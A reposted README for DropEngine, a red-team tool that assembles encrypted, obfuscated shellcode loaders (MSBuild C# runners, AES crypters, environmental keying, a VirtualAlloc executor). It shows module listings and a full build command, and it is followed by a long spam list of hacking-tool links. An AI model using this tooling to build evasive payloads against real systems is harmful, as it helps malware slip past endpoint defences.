Web Search

Custom Search

Search Results

Friday, August 21, 2020

DropEngine - Malleable Payloads!



By @s0lst1c3

Disclaimer
DropEngine (the "Software") and associated documentation is provided "AS IS". The Developer makes no other warranties, express or implied, and hereby disclaims all implied warranties, including any warranty of merchantability and warranty of fitness for a particular purpose. Any actions or activities related to the use of the Software are the sole responsibility of the end user. The Developer will not be held responsible in the event that any criminal charges are brought against any individuals using or misusing the Software. It is up to the end user to use the Software in an authorized manner and to ensure that their use complies with all applicable laws and regulations.

Install
Clone the git repo:
git clone https://github.com/s0lst1c3/dropengine.git
Create a new virtual env:
python3.7 -m venv venv 
Activate the virtual env:
source venv/bin/activate

Constructing a Basic Payload

Module Selection
DropEngine accepts a list of module names from the command line and uses them to construct a payload. To make things a bit easier to follow, this guide will walk you through the process of listing the various types of modules needed to create a basic payload. Keep in mind that we're not actually executing anything yet. We're just seeing what modules are available and describing what they do.
First, we need to decide what kind of shellcode runner we want to use. To get a list of available shellcode runners, use the --list runners flag:
Command:
python dropengine.py --list runners
Example Output:
(venv) s0lst1c3@DESKTOP-NC0U49D:/mnt/c/Users/s0lst1c3/obfuscation$ python dropengine.py --list runners

Listing runners:

runner - basic_csharp_runner
runner - basic_csharp_runner_no_mutation
runner - csharp_installutil
runner - msbuild_csharp_runner

(venv) s0lst1c3@DESKTOP-NC0U49D:/mnt/c/Users/s0lst1c3/obfuscation$
We'll go ahead and plan to use the "msbuild_csharp_runner", which will give us an MSBuild payload written in C#.
Next, we'll need to select an interface module that is compatible with our shellcode runner. In DropEngine, you can think of interfaces as the "glue" that binds your payload together. The interface facilitates communication between you (the user), and between the various modules in your payload.
To get a list of available interfaces, use the --list interfaces flag as shown in the following example:
Command:
python dropengine.py --list interfaces
Example Output:
(venv) s0lst1c3@DESKTOP-NC0U49D:/mnt/c/Users/s0lst1c3/obfuscation$ python dropengine.py --list interfaces

Listing interfaces:

runner_interface - csharp_runner_interface - Interface for generating CSharp payloads
As you can see from the Example Output shown above, the only available interface at this time is the csharp_runner_interface, which is designed for building payloads using C#.
Next, let's decide on a crypter to protect our shellcode. To obtain a list of available crypters, use the --list crypters flag as shown below:
Command:
python dropengine.py --list crypters
Example Output:
(venv) s0lst1c3@DESKTOP-NC0U49D:/mnt/c/Users/s0lst1c3/obfuscation$ python dropengine.py --list crypters 

Listing crypters:

crypter - crypter_aes

(venv) s0lst1c3@DESKTOP-NC0U49D:/mnt/c/Users/s0lst1c3/obfuscation$
As with our interfaces, we really only have one crypter module available at this time, and that's "crypter_aes".
We'll also need a decrypter module to convert our shellcode back into plaintext. To get a list of decrypters, use the --list decrypters command:
Command:
decrypter - decrypter_csharp_rijndael_aes
Example Output:
(venv) s0lst1c3@DESKTOP-NC0U49D:/mnt/c/Users/s0lst1c3/obfuscation$ python dropengine.py --list decrypters

Listing decrypters:

decrypter - decrypter_csharp_rijndael_aes

(venv) s0lst1c3@DESKTOP-NC0U49D:/mnt/c/Users/s0lst1c3/obfuscation$
We'll go ahead and use the "decrypter_csharp_rijndael_aes", since it's compatible with our crypter module.
Now we need to select encryption and decryption key modules to use with our selected crypter and decrypter. To list all available crypters and decrypters, use the --list ekeys dkeys command as shown below:
Command:
 python dropengine.py --list ekeys dkeys
Example Output:
(venv) s0lst1c3@DESKTOP-NC0U49D:/mnt/c/Users/s0lst1c3/obfuscation$ python dropengine.py --list ekeys dkeys

Listing ekeys:

ekey - ekey_env_ad_domain_name
ekey - ekey_env_ext_fqdn
ekey - ekey_env_ext_ip
ekey - ekey_env_hd_serial
ekey - ekey_env_int_fqdn
ekey - ekey_env_int_hostname
ekey - ekey_env_mac_addr
ekey - ekey_env_mac_oui
ekey - ekey_env_moonphase
ekey - ekey_env_timezone
ekey - ekey_env_username
ekey - ekey_env_vol_serial
ekey - ekey_one_time_remote_http
ekey - ekey_static

Listing dkeys:

dkey - dkey_csharp_static
dkey - dkey_csharp_env_ad_domain_name
dkey - dkey_env_csharp_ext_fqdn
dkey - dkey_env_csharp_ext_ip
dkey - dkey_env_csharp_hd_serial
dkey - dkey_env_csharp_int_fqdn
dkey - dkey_env_csharp_int_hostname
dkey - dkey_env_c sharp_mac_addr
dkey - dkey_env_csharp_mac_oui
dkey - dkey_env_csharp_moonphase
dkey - dkey_env_csharp_timezone
dkey - dkey_env_csharp_username
dkey - dkey_env_csharp_vol_serial
dkey - dkey_remote_csharp_otk_http

(venv) s0lst1c3@DESKTOP-NC0U49D:/mnt/c/Users/s0lst1c3/obfuscation$
Let's keep things simple for now and use the two static key modules: "dkey_csharp_static" and "ekey_static".
Next, we need to select an executor module to execute our raw shellcode. To get a list of available executors:
Command:
python dropengine.py --list executors
Example Output:
(venv) s0lst1c3@DESKTOP-NC0U49D:/mnt/c/Users/s0lst1c3/obfuscation$ python dropengine.py --list executors

Listing executors:

executor - executor_csharp_virtual_alloc_thread

(venv) s0lst1c3@DESKTOP-NC0U49D:/mnt/c/Users/s0lst1c3/obfuscation$
At this time, our only compatible executor is "executor_csharp_virtual_alloc_thread", so we'll use that.
Finally, we just need to select a mutator module to perform symbol transformation on our completed payload. To get a list of available mutators, use the --list mutators command:
Command:
python dropengine.py --list mutators
Example Output:
(venv) s0lst1c3@DESKTOP-NC0U49D:/mnt/c/Users/s0lst1c3/obfuscation$ python dropengine.py --list mutators

Listing mutators:

mutator - mutator_null
mutator - mutator_random_string
mutator - mutator_rot13
mutator - mutator_wordlist

(venv) s0lst1c3@DESKTOP-NC0U49D:/mnt/c/Users/s0lst1c3/obfuscation$
We'll go ahead and use the "mutator_random_string" module.
Select a runne here

Creating the Payload
We've now explored the various payload components available to us and selected the ones we want to use. Now it's time to create our payload. Recall that in the previous section we made the following sections:
  • interface - csharp_runner_interface
  • crypter - crypter_aes
  • decrypter - decrypter_csharp_rijndael_aes
  • encryption key - ekey_static
  • decryption key - dkey_csharp_static
  • executor - executor_csharp_virtual_alloc_thread
  • mutator mutator_random_string
To run DropEngine with these selections, use the following command (note that the --shellcode flag should point to your shellcode, and the -o flag will specify the output path):
(venv) s0lst1c3@DESKTOP-NC0U49D:/mnt/c/Users/s0lst1c3/obfuscation$ python dropengine.py --interface csharp_runner_interface \
--crypter crypter_aes \
--decrypter decrypter_csharp_rijndael_aes \
--ekey ekey_static \
--runner msbuild_csharp_runner \
--dkey dkey_csharp_static \
--executor executor_csharp_virtual_alloc_thread \
--mutator mutator_random_string \
--shellcode shell.bin \
--o example.csproj

Acknowledgements
This tool either builds upon, is inspired by, or directly incorporates prior research and development from the following awesome people:
Applocker Bypasses
Enivoronmental Keying
Remote Keying
Payload Obfuscation
Dynamic Imports and Modular Design Patterns
Sandbox Evasion




via KitPloit

Related links


  1. Pentest Tools Website Vulnerability
  2. Nsa Hack Tools Download
  3. Hacker Tools Mac
  4. Hacking Tools For Games
  5. Pentest Tools Review
  6. Hacking Tools Name
  7. Hacking Tools Hardware
  8. Hack Tools Github
  9. Pentest Tools Review
  10. Hacker
  11. Tools Used For Hacking
  12. Hacking Tools Github
  13. Hack Tools Pc
  14. Black Hat Hacker Tools
  15. Pentest Recon Tools
  16. Hack Tools For Mac
  17. Best Hacking Tools 2020
  18. Pentest Tools Github
  19. Pentest Tools For Ubuntu
  20. Pentest Tools List
  21. Hacker Tools Github
  22. Nsa Hack Tools Download
  23. Hack Rom Tools
  24. Hacking Tools For Kali Linux
  25. New Hacker Tools
  26. Black Hat Hacker Tools
  27. Pentest Tools Port Scanner
  28. Pentest Tools Website
  29. Hacker Tools Online
  30. Pentest Tools Kali Linux
  31. Pentest Tools Kali Linux
  32. Pentest Tools Review
  33. Hack Tools Online
  34. Pentest Tools Download
  35. Hack Tools
  36. Game Hacking
  37. Hacker Security Tools
  38. Hacker Tools 2020
  39. Hack Tools
  40. Pentest Reporting Tools
  41. Install Pentest Tools Ubuntu
  42. Pentest Tools Linux
  43. How To Hack
  44. Pentest Tools Website
  45. Pentest Tools For Mac
  46. Hacking Tools For Pc
  47. What Is Hacking Tools
  48. Hacker Tools Apk Download
  49. Hacking Tools Online
  50. Hacker Tools Mac
  51. Hacking Apps
  52. Tools 4 Hack
  53. Hacking Tools Software
  54. Pentest Tools Windows
  55. Hacking Tools Windows
  56. Pentest Tools Online
  57. Github Hacking Tools
  58. Android Hack Tools Github
  59. Hack Tool Apk
  60. Hacking Tools For Windows 7
  61. Hackers Toolbox
  62. Nsa Hacker Tools
  63. Hacker Tools For Mac
  64. Hacking Tools For Windows 7
  65. Hacker Tools Windows
  66. Hacking Tools Online
  67. Hacker
  68. Hack App
  69. Hacker Tools For Pc
  70. Hacker Tools For Pc
  71. Hacking Tools Github
  72. Pentest Tools Bluekeep
  73. Kik Hack Tools
  74. Hacking Tools For Mac
  75. Hack Tools For Mac
  76. Hackers Toolbox
  77. Hacking Tools For Windows 7
  78. Hackrf Tools
  79. What Is Hacking Tools
  80. Hacking Tools Hardware
  81. Pentest Tools Website Vulnerability

No comments: